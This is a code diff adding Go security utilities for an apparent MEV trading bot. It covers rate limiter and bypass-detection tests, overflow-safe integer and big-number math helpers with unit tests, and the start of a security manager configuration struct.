|
||||
|
||||
// Recalculate health
|
||||
health2, score2 := profiler.calculateOverallHealth()
|
||||
assert.Less(t, score2, score) // Score should be lower with issues
|
||||
assert.NotEqual(t, "excellent", health2) // Should not be excellent anymore
|
||||
}
|
||||
1411
orig/pkg/security/rate_limiter.go
Normal file
1411
orig/pkg/security/rate_limiter.go
Normal file
File diff suppressed because it is too large
Load Diff
175
orig/pkg/security/rate_limiter_test.go
Normal file
175
orig/pkg/security/rate_limiter_test.go
Normal file
@@ -0,0 +1,175 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"context"
|
||||
"testing"
|
||||
"time"
|
||||
)
|
||||
|
||||
func TestEnhancedRateLimiter(t *testing.T) {
|
||||
|
||||
config := &RateLimiterConfig{
|
||||
IPRequestsPerSecond: 5,
|
||||
IPBurstSize: 10,
|
||||
GlobalRequestsPerSecond: 10000, // Set high global limit
|
||||
GlobalBurstSize: 20000, // Set high global burst
|
||||
UserRequestsPerSecond: 1000, // Set high user limit
|
||||
UserBurstSize: 2000, // Set high user burst
|
||||
SlidingWindowEnabled: false, // Disabled for testing basic burst logic
|
||||
SlidingWindowSize: time.Minute,
|
||||
SlidingWindowPrecision: time.Second,
|
||||
AdaptiveEnabled: false, // Disabled for testing basic burst logic
|
||||
AdaptiveAdjustInterval: 100 * time.Millisecond,
|
||||
SystemLoadThreshold: 80.0,
|
||||
BypassDetectionEnabled: true,
|
||||
BypassThreshold: 3,
|
||||
CleanupInterval: time.Minute,
|
||||
BucketTTL: time.Hour,
|
||||
}
|
||||
|
||||
rl := NewEnhancedRateLimiter(config)
|
||||
defer rl.Stop()
|
||||
|
||||
ctx := context.Background()
|
||||
headers := make(map[string]string)
|
||||
|
||||
// Test basic rate limiting
|
||||
for i := 0; i < 3; i++ {
|
||||
result := rl.CheckRateLimitEnhanced(ctx, "127.0.0.1", "test-user", "TestAgent", "test", headers)
|
||||
if !result.Allowed {
|
||||
t.Errorf("Request %d should be allowed, but got: %s - %s", i+1, result.ReasonCode, result.Message)
|
||||
}
|
||||
}
|
||||
|
||||
// Test burst capacity (should allow up to burst size)
|
||||
// We already made 3 requests, so we can make 7 more before hitting the limit
|
||||
for i := 0; i < 7; i++ {
|
||||
result := rl.CheckRateLimitEnhanced(ctx, "127.0.0.1", "test-user", "TestAgent", "test", headers)
|
||||
if !result.Allowed {
|
||||
t.Errorf("Request %d should be allowed within burst, but got: %s - %s", i+4, result.ReasonCode, result.Message)
|
||||
}
|
||||
}
|
||||
|
||||
// Now we should exceed the burst limit and be rate limited
|
||||
for i := 0; i < 5; i++ {
|
||||
result := rl.CheckRateLimitEnhanced(ctx, "127.0.0.1", "test-user", "TestAgent", "test", headers)
|
||||
if result.Allowed {
|
||||
t.Errorf("Request %d should be rate limited (exceeded burst)", i+11)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestSlidingWindow(t *testing.T) {
|
||||
window := NewSlidingWindow(5, time.Minute, time.Second)
|
||||
|
||||
// Test within limit
|
||||
for i := 0; i < 5; i++ {
|
||||
if !window.IsAllowed() {
|
||||
t.Errorf("Request %d should be allowed", i+1)
|
||||
}
|
||||
}
|
||||
|
||||
// Test exceeding limit
|
||||
if window.IsAllowed() {
|
||||
t.Error("Request should be denied after exceeding limit")
|
||||
}
|
||||
}
|
||||
|
||||
func TestBypassDetection(t *testing.T) {
|
||||
detector := NewBypassDetector(3, time.Hour, time.Minute)
|
||||
headers := make(map[string]string)
|
||||
|
||||
// Test normal behavior
|
||||
result := detector.DetectBypass("127.0.0.1", "TestAgent", headers, false)
|
||||
if result.BypassDetected {
|
||||
t.Error("Normal behavior should not trigger bypass detection")
|
||||
}
|
||||
|
||||
// Test bypass pattern (multiple rate limit hits)
|
||||
for i := 0; i < 25; i++ { // Increased to trigger MEDIUM severity
|
||||
result = detector.DetectBypass("127.0.0.1", "TestAgent", headers, true)
|
||||
}
|
||||
|
||||
if !result.BypassDetected {
|
||||
t.Error("Multiple rate limit hits should trigger bypass detection")
|
||||
}
|
||||
|
||||
if result.Severity != "MEDIUM" && result.Severity != "HIGH" {
|
||||
t.Errorf("Expected MEDIUM or HIGH severity, got %s", result.Severity)
|
||||
}
|
||||
}
|
||||
|
||||
func TestSystemLoadMonitor(t *testing.T) {
|
||||
monitor := NewSystemLoadMonitor(100 * time.Millisecond)
|
||||
defer monitor.Stop()
|
||||
|
||||
// Allow some time for monitoring to start
|
||||
time.Sleep(200 * time.Millisecond)
|
||||
|
||||
cpu, memory, load, goroutines := monitor.GetCurrentLoad()
|
||||
|
||||
if cpu < 0 || cpu > 100 {
|
||||
t.Errorf("CPU usage should be between 0-100, got %f", cpu)
|
||||
}
|
||||
|
||||
if memory < 0 || memory > 100 {
|
||||
t.Errorf("Memory usage should be between 0-100, got %f", memory)
|
||||
}
|
||||
|
||||
if load < 0 {
|
||||
t.Errorf("Load average should be positive, got %f", load)
|
||||
}
|
||||
|
||||
if goroutines <= 0 {
|
||||
t.Errorf("Goroutine count should be positive, got %d", goroutines)
|
||||
}
|
||||
}
|
||||
|
||||
func TestEnhancedMetrics(t *testing.T) {
|
||||
config := &RateLimiterConfig{
|
||||
IPRequestsPerSecond: 10,
|
||||
SlidingWindowEnabled: true,
|
||||
AdaptiveEnabled: true,
|
||||
AdaptiveAdjustInterval: 100 * time.Millisecond,
|
||||
BypassDetectionEnabled: true,
|
||||
CleanupInterval: time.Second,
|
||||
BypassThreshold: 5,
|
||||
BypassDetectionWindow: time.Minute,
|
||||
BypassAlertCooldown: time.Minute,
|
||||
}
|
||||
|
||||
rl := NewEnhancedRateLimiter(config)
|
||||
defer rl.Stop()
|
||||
|
||||
metrics := rl.GetEnhancedMetrics()
|
||||
|
||||
// Check that all expected metrics are present
|
||||
expectedKeys := []string{
|
||||
"sliding_window_enabled",
|
||||
"adaptive_enabled",
|
||||
"bypass_detection_enabled",
|
||||
"system_cpu_usage",
|
||||
"system_memory_usage",
|
||||
"system_load_average",
|
||||
"system_goroutines",
|
||||
}
|
||||
|
||||
for _, key := range expectedKeys {
|
||||
if _, exists := metrics[key]; !exists {
|
||||
t.Errorf("Expected metric %s not found", key)
|
||||
}
|
||||
}
|
||||
|
||||
// Verify boolean flags
|
||||
if metrics["sliding_window_enabled"] != true {
|
||||
t.Error("sliding_window_enabled should be true")
|
||||
}
|
||||
|
||||
if metrics["adaptive_enabled"] != true {
|
||||
t.Error("adaptive_enabled should be true")
|
||||
}
|
||||
|
||||
if metrics["bypass_detection_enabled"] != true {
|
||||
t.Error("bypass_detection_enabled should be true")
|
||||
}
|
||||
}
|
||||
54
orig/pkg/security/safe_conversions.go
Normal file
54
orig/pkg/security/safe_conversions.go
Normal file
@@ -0,0 +1,54 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"math"
|
||||
)
|
||||
|
||||
// SafeUint64ToUint32 converts uint64 to uint32 with overflow check
|
||||
func SafeUint64ToUint32(value uint64) (uint32, error) {
|
||||
if value > math.MaxUint32 {
|
||||
return 0, fmt.Errorf("value %d exceeds maximum uint32 value %d", value, math.MaxUint32)
|
||||
}
|
||||
return uint32(value), nil
|
||||
}
|
||||
|
||||
// SafeUint64ToInt64 converts uint64 to int64 with bounds check
|
||||
func SafeUint64ToInt64(value uint64) (int64, error) {
|
||||
if value > math.MaxInt64 {
|
||||
return 0, fmt.Errorf("value %d exceeds maximum int64 value %d", value, math.MaxInt64)
|
||||
}
|
||||
return int64(value), nil
|
||||
}
|
||||
|
||||
// SafeUint64ToUint32WithDefault converts uint64 to uint32 with overflow check and default value
|
||||
func SafeUint64ToUint32WithDefault(value uint64, defaultValue uint32) uint32 {
|
||||
if value > math.MaxUint32 {
|
||||
return defaultValue
|
||||
}
|
||||
return uint32(value)
|
||||
}
|
||||
|
||||
// SafeAddUint64 adds two uint64 values with overflow check
|
||||
func SafeAddUint64(a, b uint64) (uint64, error) {
|
||||
if a > math.MaxUint64-b {
|
||||
return 0, fmt.Errorf("addition overflow: %d + %d exceeds maximum uint64 value", a, b)
|
||||
}
|
||||
return a + b, nil
|
||||
}
|
||||
|
||||
// SafeSubtractUint64 subtracts b from a with underflow check
|
||||
func SafeSubtractUint64(a, b uint64) (uint64, error) {
|
||||
if a < b {
|
||||
return 0, fmt.Errorf("subtraction underflow: %d - %d results in negative value", a, b)
|
||||
}
|
||||
return a - b, nil
|
||||
}
|
||||
|
||||
// SafeMultiplyUint64 multiplies two uint64 values with overflow check
|
||||
func SafeMultiplyUint64(a, b uint64) (uint64, error) {
|
||||
if b != 0 && a > math.MaxUint64/b {
|
||||
return 0, fmt.Errorf("multiplication overflow: %d * %d exceeds maximum uint64 value", a, b)
|
||||
}
|
||||
return a * b, nil
|
||||
}
|
||||
343
orig/pkg/security/safe_conversions_test.go
Normal file
343
orig/pkg/security/safe_conversions_test.go
Normal file
@@ -0,0 +1,343 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"math"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestSafeUint64ToUint32(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
input uint64
|
||||
expected uint32
|
||||
expectError bool
|
||||
}{
|
||||
{
|
||||
name: "zero value",
|
||||
input: 0,
|
||||
expected: 0,
|
||||
expectError: false,
|
||||
},
|
||||
{
|
||||
name: "small positive value",
|
||||
input: 1000,
|
||||
expected: 1000,
|
||||
expectError: false,
|
||||
},
|
||||
{
|
||||
name: "max uint32 value",
|
||||
input: math.MaxUint32,
|
||||
expected: math.MaxUint32,
|
||||
expectError: false,
|
||||
},
|
||||
{
|
||||
name: "overflow value",
|
||||
input: math.MaxUint32 + 1,
|
||||
expected: 0,
|
||||
expectError: true,
|
||||
},
|
||||
{
|
||||
name: "large overflow value",
|
||||
input: math.MaxUint64,
|
||||
expected: 0,
|
||||
expectError: true,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result, err := SafeUint64ToUint32(tt.input)
|
||||
|
||||
if tt.expectError {
|
||||
if err == nil {
|
||||
t.Errorf("SafeUint64ToUint32(%d) expected error but got none", tt.input)
|
||||
}
|
||||
} else {
|
||||
if err != nil {
|
||||
t.Errorf("SafeUint64ToUint32(%d) unexpected error: %v", tt.input, err)
|
||||
}
|
||||
if result != tt.expected {
|
||||
t.Errorf("SafeUint64ToUint32(%d) = %d, want %d", tt.input, result, tt.expected)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestSafeUint64ToInt64(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
input uint64
|
||||
expected int64
|
||||
expectError bool
|
||||
}{
|
||||
{
|
||||
name: "zero value",
|
||||
input: 0,
|
||||
expected: 0,
|
||||
expectError: false,
|
||||
},
|
||||
{
|
||||
name: "small positive value",
|
||||
input: 1000,
|
||||
expected: 1000,
|
||||
expectError: false,
|
||||
},
|
||||
{
|
||||
name: "max int64 value",
|
||||
input: math.MaxInt64,
|
||||
expected: math.MaxInt64,
|
||||
expectError: false,
|
||||
},
|
||||
{
|
||||
name: "overflow value",
|
||||
input: math.MaxInt64 + 1,
|
||||
expected: 0,
|
||||
expectError: true,
|
||||
},
|
||||
{
|
||||
name: "max uint64 value",
|
||||
input: math.MaxUint64,
|
||||
expected: 0,
|
||||
expectError: true,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result, err := SafeUint64ToInt64(tt.input)
|
||||
|
||||
if tt.expectError {
|
||||
if err == nil {
|
||||
t.Errorf("SafeUint64ToInt64(%d) expected error but got none", tt.input)
|
||||
}
|
||||
} else {
|
||||
if err != nil {
|
||||
t.Errorf("SafeUint64ToInt64(%d) unexpected error: %v", tt.input, err)
|
||||
}
|
||||
if result != tt.expected {
|
||||
t.Errorf("SafeUint64ToInt64(%d) = %d, want %d", tt.input, result, tt.expected)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestSafeUint64ToUint32WithDefault(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
input uint64
|
||||
defaultValue uint32
|
||||
expected uint32
|
||||
}{
|
||||
{
|
||||
name: "valid value",
|
||||
input: 1000,
|
||||
defaultValue: 500,
|
||||
expected: 1000,
|
||||
},
|
||||
{
|
||||
name: "overflow uses default",
|
||||
input: math.MaxUint32 + 1,
|
||||
defaultValue: 500,
|
||||
expected: 500,
|
||||
},
|
||||
{
|
||||
name: "max valid value",
|
||||
input: math.MaxUint32,
|
||||
defaultValue: 500,
|
||||
expected: math.MaxUint32,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result := SafeUint64ToUint32WithDefault(tt.input, tt.defaultValue)
|
||||
if result != tt.expected {
|
||||
t.Errorf("SafeUint64ToUint32WithDefault(%d, %d) = %d, want %d",
|
||||
tt.input, tt.defaultValue, result, tt.expected)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestSafeAddUint64(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
a uint64
|
||||
b uint64
|
||||
expected uint64
|
||||
expectError bool
|
||||
}{
|
||||
{
|
||||
name: "small values",
|
||||
a: 100,
|
||||
b: 200,
|
||||
expected: 300,
|
||||
expectError: false,
|
||||
},
|
||||
{
|
||||
name: "zero addition",
|
||||
a: 1000,
|
||||
b: 0,
|
||||
expected: 1000,
|
||||
expectError: false,
|
||||
},
|
||||
{
|
||||
name: "overflow case",
|
||||
a: math.MaxUint64,
|
||||
b: 1,
|
||||
expected: 0,
|
||||
expectError: true,
|
||||
},
|
||||
{
|
||||
name: "near max valid",
|
||||
a: math.MaxUint64 - 1,
|
||||
b: 1,
|
||||
expected: math.MaxUint64,
|
||||
expectError: false,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result, err := SafeAddUint64(tt.a, tt.b)
|
||||
|
||||
if tt.expectError {
|
||||
if err == nil {
|
||||
t.Errorf("SafeAddUint64(%d, %d) expected error but got none", tt.a, tt.b)
|
||||
}
|
||||
} else {
|
||||
if err != nil {
|
||||
t.Errorf("SafeAddUint64(%d, %d) unexpected error: %v", tt.a, tt.b, err)
|
||||
}
|
||||
if result != tt.expected {
|
||||
t.Errorf("SafeAddUint64(%d, %d) = %d, want %d", tt.a, tt.b, result, tt.expected)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestSafeMultiplyUint64(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
a uint64
|
||||
b uint64
|
||||
expected uint64
|
||||
expectError bool
|
||||
}{
|
||||
{
|
||||
name: "small values",
|
||||
a: 100,
|
||||
b: 200,
|
||||
expected: 20000,
|
||||
expectError: false,
|
||||
},
|
||||
{
|
||||
name: "zero multiplication",
|
||||
a: 1000,
|
||||
b: 0,
|
||||
expected: 0,
|
||||
expectError: false,
|
||||
},
|
||||
{
|
||||
name: "one multiplication",
|
||||
a: 1000,
|
||||
b: 1,
|
||||
expected: 1000,
|
||||
expectError: false,
|
||||
},
|
||||
{
|
||||
name: "overflow case",
|
||||
a: math.MaxUint64,
|
||||
b: 2,
|
||||
expected: 0,
|
||||
expectError: true,
|
||||
},
|
||||
{
|
||||
name: "large values overflow",
|
||||
a: math.MaxUint64 / 2,
|
||||
b: 3,
|
||||
expected: 0,
|
||||
expectError: true,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result, err := SafeMultiplyUint64(tt.a, tt.b)
|
||||
|
||||
if tt.expectError {
|
||||
if err == nil {
|
||||
t.Errorf("SafeMultiplyUint64(%d, %d) expected error but got none", tt.a, tt.b)
|
||||
}
|
||||
} else {
|
||||
if err != nil {
|
||||
t.Errorf("SafeMultiplyUint64(%d, %d) unexpected error: %v", tt.a, tt.b, err)
|
||||
}
|
||||
if result != tt.expected {
|
||||
t.Errorf("SafeMultiplyUint64(%d, %d) = %d, want %d", tt.a, tt.b, result, tt.expected)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestSafeSubtractUint64(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
a uint64
|
||||
b uint64
|
||||
expected uint64
|
||||
expectError bool
|
||||
}{
|
||||
{
|
||||
name: "normal subtraction",
|
||||
a: 1000,
|
||||
b: 200,
|
||||
expected: 800,
|
||||
expectError: false,
|
||||
},
|
||||
{
|
||||
name: "zero result",
|
||||
a: 1000,
|
||||
b: 1000,
|
||||
expected: 0,
|
||||
expectError: false,
|
||||
},
|
||||
{
|
||||
name: "underflow case",
|
||||
a: 100,
|
||||
b: 200,
|
||||
expected: 0,
|
||||
expectError: true,
|
||||
},
|
||||
{
|
||||
name: "subtract zero",
|
||||
a: 1000,
|
||||
b: 0,
|
||||
expected: 1000,
|
||||
expectError: false,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result, err := SafeSubtractUint64(tt.a, tt.b)
|
||||
|
||||
if tt.expectError {
|
||||
if err == nil {
|
||||
t.Errorf("SafeSubtractUint64(%d, %d) expected error but got none", tt.a, tt.b)
|
||||
}
|
||||
} else {
|
||||
if err != nil {
|
||||
t.Errorf("SafeSubtractUint64(%d, %d) unexpected error: %v", tt.a, tt.b, err)
|
||||
}
|
||||
if result != tt.expected {
|
||||
t.Errorf("SafeSubtractUint64(%d, %d) = %d, want %d", tt.a, tt.b, result, tt.expected)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
234
orig/pkg/security/safemath.go
Normal file
234
orig/pkg/security/safemath.go
Normal file
@@ -0,0 +1,234 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"errors"
|
||||
"fmt"
|
||||
"math"
|
||||
"math/big"
|
||||
)
|
||||
|
||||
var (
|
||||
// ErrIntegerOverflow indicates an integer overflow would occur
|
||||
ErrIntegerOverflow = errors.New("integer overflow detected")
|
||||
// ErrIntegerUnderflow indicates an integer underflow would occur
|
||||
ErrIntegerUnderflow = errors.New("integer underflow detected")
|
||||
// ErrDivisionByZero indicates division by zero was attempted
|
||||
ErrDivisionByZero = errors.New("division by zero")
|
||||
// ErrInvalidConversion indicates an invalid type conversion
|
||||
ErrInvalidConversion = errors.New("invalid type conversion")
|
||||
)
|
||||
|
||||
// SafeMath provides safe mathematical operations with overflow protection
|
||||
type SafeMath struct {
|
||||
// MaxGasPrice is the maximum allowed gas price in wei
|
||||
MaxGasPrice *big.Int
|
||||
// MaxTransactionValue is the maximum allowed transaction value
|
||||
MaxTransactionValue *big.Int
|
||||
}
|
||||
|
||||
// NewSafeMath creates a new SafeMath instance with security limits
|
||||
func NewSafeMath() *SafeMath {
|
||||
// 10000 Gwei max gas price
|
||||
maxGasPrice := new(big.Int).Mul(big.NewInt(10000), big.NewInt(1e9))
|
||||
// 10000 ETH max transaction value
|
||||
maxTxValue := new(big.Int).Mul(big.NewInt(10000), big.NewInt(1e18))
|
||||
|
||||
return &SafeMath{
|
||||
MaxGasPrice: maxGasPrice,
|
||||
MaxTransactionValue: maxTxValue,
|
||||
}
|
||||
}
|
||||
|
||||
// SafeUint8 safely converts uint64 to uint8 with overflow check
|
||||
func SafeUint8(val uint64) (uint8, error) {
|
||||
if val > math.MaxUint8 {
|
||||
return 0, fmt.Errorf("%w: value %d exceeds uint8 max %d", ErrIntegerOverflow, val, math.MaxUint8)
|
||||
}
|
||||
return uint8(val), nil
|
||||
}
|
||||
|
||||
// SafeUint32 safely converts uint64 to uint32 with overflow check
|
||||
func SafeUint32(val uint64) (uint32, error) {
|
||||
if val > math.MaxUint32 {
|
||||
return 0, fmt.Errorf("%w: value %d exceeds uint32 max %d", ErrIntegerOverflow, val, math.MaxUint32)
|
||||
}
|
||||
return uint32(val), nil
|
||||
}
|
||||
|
||||
// SafeUint64FromBigInt safely converts big.Int to uint64
|
||||
func SafeUint64FromBigInt(val *big.Int) (uint64, error) {
|
||||
if val == nil {
|
||||
return 0, fmt.Errorf("%w: nil value", ErrInvalidConversion)
|
||||
}
|
||||
if val.Sign() < 0 {
|
||||
return 0, fmt.Errorf("%w: negative value %s", ErrIntegerUnderflow, val.String())
|
||||
}
|
||||
if val.BitLen() > 64 {
|
||||
return 0, fmt.Errorf("%w: value %s exceeds uint64 max", ErrIntegerOverflow, val.String())
|
||||
}
|
||||
return val.Uint64(), nil
|
||||
}
|
||||
|
||||
// SafeAdd performs safe addition with overflow check
|
||||
func (sm *SafeMath) SafeAdd(a, b *big.Int) (*big.Int, error) {
|
||||
if a == nil || b == nil {
|
||||
return nil, fmt.Errorf("%w: nil operand", ErrInvalidConversion)
|
||||
}
|
||||
|
||||
result := new(big.Int).Add(a, b)
|
||||
|
||||
// Check against maximum transaction value
|
||||
if result.Cmp(sm.MaxTransactionValue) > 0 {
|
||||
return nil, fmt.Errorf("%w: sum exceeds max transaction value", ErrIntegerOverflow)
|
||||
}
|
||||
|
||||
return result, nil
|
||||
}
|
||||
|
||||
// SafeSubtract performs safe subtraction with underflow check
|
||||
func (sm *SafeMath) SafeSubtract(a, b *big.Int) (*big.Int, error) {
|
||||
if a == nil || b == nil {
|
||||
return nil, fmt.Errorf("%w: nil operand", ErrInvalidConversion)
|
||||
}
|
||||
|
||||
result := new(big.Int).Sub(a, b)
|
||||
|
||||
// Check for negative result (underflow)
|
||||
if result.Sign() < 0 {
|
||||
return nil, fmt.Errorf("%w: subtraction would result in negative value", ErrIntegerUnderflow)
|
||||
}
|
||||
|
||||
return result, nil
|
||||
}
|
||||
|
||||
// SafeMultiply performs safe multiplication with overflow check
|
||||
func (sm *SafeMath) SafeMultiply(a, b *big.Int) (*big.Int, error) {
|
||||
if a == nil || b == nil {
|
||||
return nil, fmt.Errorf("%w: nil operand", ErrInvalidConversion)
|
||||
}
|
||||
|
||||
// Check for zero to avoid unnecessary computation
|
||||
if a.Sign() == 0 || b.Sign() == 0 {
|
||||
return big.NewInt(0), nil
|
||||
}
|
||||
|
||||
result := new(big.Int).Mul(a, b)
|
||||
|
||||
// Check against maximum transaction value
|
||||
if result.Cmp(sm.MaxTransactionValue) > 0 {
|
||||
return nil, fmt.Errorf("%w: product exceeds max transaction value", ErrIntegerOverflow)
|
||||
}
|
||||
|
||||
return result, nil
|
||||
}
|
||||
|
||||
// SafeDivide performs safe division with zero check
|
||||
func (sm *SafeMath) SafeDivide(a, b *big.Int) (*big.Int, error) {
|
||||
if a == nil || b == nil {
|
||||
return nil, fmt.Errorf("%w: nil operand", ErrInvalidConversion)
|
||||
}
|
||||
|
||||
if b.Sign() == 0 {
|
||||
return nil, ErrDivisionByZero
|
||||
}
|
||||
|
||||
return new(big.Int).Div(a, b), nil
|
||||
}
|
||||
|
||||
// SafePercent calculates percentage safely (value * percent / 100)
|
||||
func (sm *SafeMath) SafePercent(value *big.Int, percent uint64) (*big.Int, error) {
|
||||
if value == nil {
|
||||
return nil, fmt.Errorf("%w: nil value", ErrInvalidConversion)
|
||||
}
|
||||
|
||||
if percent > 10000 { // Max 100.00% with 2 decimal precision
|
||||
return nil, fmt.Errorf("%w: percent %d exceeds 10000 (100%%)", ErrIntegerOverflow, percent)
|
||||
}
|
||||
|
||||
percentBig := big.NewInt(int64(percent))
|
||||
hundred := big.NewInt(100)
|
||||
|
||||
temp := new(big.Int).Mul(value, percentBig)
|
||||
result := new(big.Int).Div(temp, hundred)
|
||||
|
||||
return result, nil
|
||||
}
|
||||
|
||||
// ValidateGasPrice ensures gas price is within safe bounds
|
||||
func (sm *SafeMath) ValidateGasPrice(gasPrice *big.Int) error {
|
||||
if gasPrice == nil {
|
||||
return fmt.Errorf("gas price cannot be nil")
|
||||
}
|
||||
|
||||
if gasPrice.Sign() < 0 {
|
||||
return fmt.Errorf("gas price cannot be negative")
|
||||
}
|
||||
|
||||
if gasPrice.Cmp(sm.MaxGasPrice) > 0 {
|
||||
return fmt.Errorf("gas price %s exceeds maximum %s", gasPrice.String(), sm.MaxGasPrice.String())
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// ValidateTransactionValue ensures transaction value is within safe bounds
|
||||
func (sm *SafeMath) ValidateTransactionValue(value *big.Int) error {
|
||||
if value == nil {
|
||||
return fmt.Errorf("transaction value cannot be nil")
|
||||
}
|
||||
|
||||
if value.Sign() < 0 {
|
||||
return fmt.Errorf("transaction value cannot be negative")
|
||||
}
|
||||
|
||||
if value.Cmp(sm.MaxTransactionValue) > 0 {
|
||||
return fmt.Errorf("transaction value %s exceeds maximum %s", value.String(), sm.MaxTransactionValue.String())
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// CalculateMinimumProfit calculates minimum profit required for a trade
|
||||
func (sm *SafeMath) CalculateMinimumProfit(gasPrice, gasLimit *big.Int) (*big.Int, error) {
|
||||
if err := sm.ValidateGasPrice(gasPrice); err != nil {
|
||||
return nil, fmt.Errorf("invalid gas price: %w", err)
|
||||
}
|
||||
|
||||
// Calculate gas cost
|
||||
gasCost, err := sm.SafeMultiply(gasPrice, gasLimit)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to calculate gas cost: %w", err)
|
||||
}
|
||||
|
||||
// Add 20% buffer for safety
|
||||
buffer, err := sm.SafePercent(gasCost, 120)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to calculate buffer: %w", err)
|
||||
}
|
||||
|
||||
return buffer, nil
|
||||
}
|
||||
|
||||
// SafeSlippage calculates safe slippage amount
|
||||
func (sm *SafeMath) SafeSlippage(amount *big.Int, slippageBps uint64) (*big.Int, error) {
|
||||
if amount == nil {
|
||||
return nil, fmt.Errorf("%w: nil amount", ErrInvalidConversion)
|
||||
}
|
||||
|
||||
// Slippage in basis points (1 bp = 0.01%)
|
||||
if slippageBps > 10000 { // Max 100%
|
||||
return nil, fmt.Errorf("%w: slippage %d bps exceeds maximum", ErrIntegerOverflow, slippageBps)
|
||||
}
|
||||
|
||||
// Calculate slippage amount
|
||||
slippageAmount := new(big.Int).Mul(amount, big.NewInt(int64(slippageBps)))
|
||||
slippageAmount.Div(slippageAmount, big.NewInt(10000))
|
||||
|
||||
// Calculate amount after slippage
|
||||
result := new(big.Int).Sub(amount, slippageAmount)
|
||||
if result.Sign() < 0 {
|
||||
return nil, fmt.Errorf("%w: slippage exceeds amount", ErrIntegerUnderflow)
|
||||
}
|
||||
|
||||
return result, nil
|
||||
}
|
||||
623
orig/pkg/security/security_manager.go
Normal file
623
orig/pkg/security/security_manager.go
Normal file
@@ -0,0 +1,623 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"context"
|
||||
"crypto/tls"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"fmt"
|
||||
"math/rand"
|
||||
"net/http"
|
||||
"os"
|
||||
"reflect"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"golang.org/x/time/rate"
|
||||
|
||||
"github.com/fraktal/mev-beta/internal/logger"
|
||||
)
|
||||
|
||||
// SecurityManager provides centralized security management for the MEV bot
|
||||
type SecurityManager struct {
|
||||
keyManager *KeyManager
|
||||
inputValidator *InputValidator
|
||||
rateLimiter *RateLimiter
|
||||
monitor *SecurityMonitor
|
||||
config *SecurityConfig
|
||||
logger *logger.Logger
|
||||
|
||||
// Circuit breakers for different components
|
||||
rpcCircuitBreaker *CircuitBreaker
|
||||
arbitrageCircuitBreaker *CircuitBreaker
|
||||
|
||||
// TLS configuration
|
||||
tlsConfig *tls.Config
|
||||
|
||||
// Rate limiters for different operations
|
||||
transactionLimiter *rate.Limiter
|
||||
rpcLimiter *rate.Limiter
|
||||
|
||||
// Security state
|
||||
emergencyMode bool
|
||||
securityAlerts []SecurityAlert
|
||||
alertsMutex sync.RWMutex
|
||||
|
||||
// Metrics
|
||||
managerMetrics *ManagerMetrics
|
||||
|
||||
rpcHTTPClient *http.Client
|
||||
}
|
||||
|
||||
// SecurityConfig contains all security-related configuration
|
||||
type SecurityConfig struct {
|
||||
// Key management
|
||||
KeyStoreDir string `yaml:"keystore_dir"`
|
||||
EncryptionEnabled bool `yaml:"encryption_enabled"`
|
||||
|
||||
// Rate limiting
|
||||
TransactionRPS int `yaml:"transaction_rps"`
|
||||
RPCRPS int `yaml:"rpc_rps"`
|
||||
MaxBurstSize int `yaml:"max_burst_size"`
|
||||
|
||||
// Circuit breaker settings
|
||||
FailureThreshold int `yaml:"failure_threshold"`
|
||||
RecoveryTimeout time.Duration `yaml:"recovery_timeout"`
|
||||
|
||||
// TLS settings
|
||||
TLSMinVersion uint16 `yaml:"tls_min_version"`
|
||||
TLSCipherSuites []uint16 `yaml:"tls_cipher_suites"`
|
||||
|
||||
// Emergency settings
|
||||
EmergencyStopFile string `yaml:"emergency_stop_file"`
|
||||
MaxGasPrice string `yaml:"max_gas_price"`
|
||||
|
||||
// Monitoring
|
||||
AlertWebhookURL string `yaml:"alert_webhook_url"`
|
||||
LogLevel string `yaml:"log_level"`
|
||||
|
||||
// RPC endpoint used by secure RPC call delegation
|
||||
RPCURL string `yaml:"rpc_url"`
|
||||
}
|
||||
|
||||
// Additional security metrics for SecurityManager
|
||||
type ManagerMetrics struct {
|
||||
AuthenticationAttempts int64 `json:"authentication_attempts"`
|
||||
FailedAuthentications int64 `json:"failed_authentications"`
|
||||
CircuitBreakerTrips int64 `json:"circuit_breaker_trips"`
|
||||
EmergencyStops int64 `json:"emergency_stops"`
|
||||
